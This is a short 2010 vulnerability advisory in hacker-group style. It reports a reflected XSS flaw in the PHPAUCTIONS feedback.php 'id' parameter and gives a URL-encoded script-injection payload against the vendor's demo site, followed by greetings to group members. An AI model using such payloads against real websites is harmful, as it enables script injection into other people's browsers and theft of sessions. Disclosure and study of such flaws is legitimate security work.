############################################################################################################# ## Tittle :PHPAUCTIONS XSS Vulnerabilities ## ## Author : SENOT (selalungantuk_exe@yahoo.com) ## ## Homepage : http://www.indonesiancoder.com ## ## Date : Thursday 04 March, 2010 ## ## Location : - INDONESIA - ## ############################################################################################################# [+] INFO [+] Name : PHPAUCTIONS [+] Vendor : http://phpauctions.info/ [+] Vulnerability : XSS [+] Dork : "Dork Just for newbie" ############################################################################################################# [ Vulnerable File ] [+] http://127.0.0.1[senot]/feedback.php?id=[INDONESIANCODER] [ DEMO ] [+] http://phpauctions.info/demo/feedback.php?id=29/%3E%22%3E%3Cscript%3Ealert%28123456789%29%3C/script%3E&faction=show ############################################################################################################# [ Thx TO ] [+] INDONESIAN CODER - ServerIsDown - IndonesianHacker - SoldierOfAllah [+] kaMtiEz,Tukulesto,M3NW5,arianom,gonzhack,tucker,saint [+] B4YU5154,nuxdtyals,qu1ck_51lv3r,Mr.J0k3R,brandal_666 [+] elv1n4,Mr.fribo,Jack,VycOd,x-shadow,bobyhikaru,deril0101 [+] ex girlfriend ( you Are my Spirit ) [+] And you [ NOTES ] [+] kaMtiEz for ayy . . u will be mine [+] Get the codes and Feel the Soul ( INDONESIANCODER TEAM )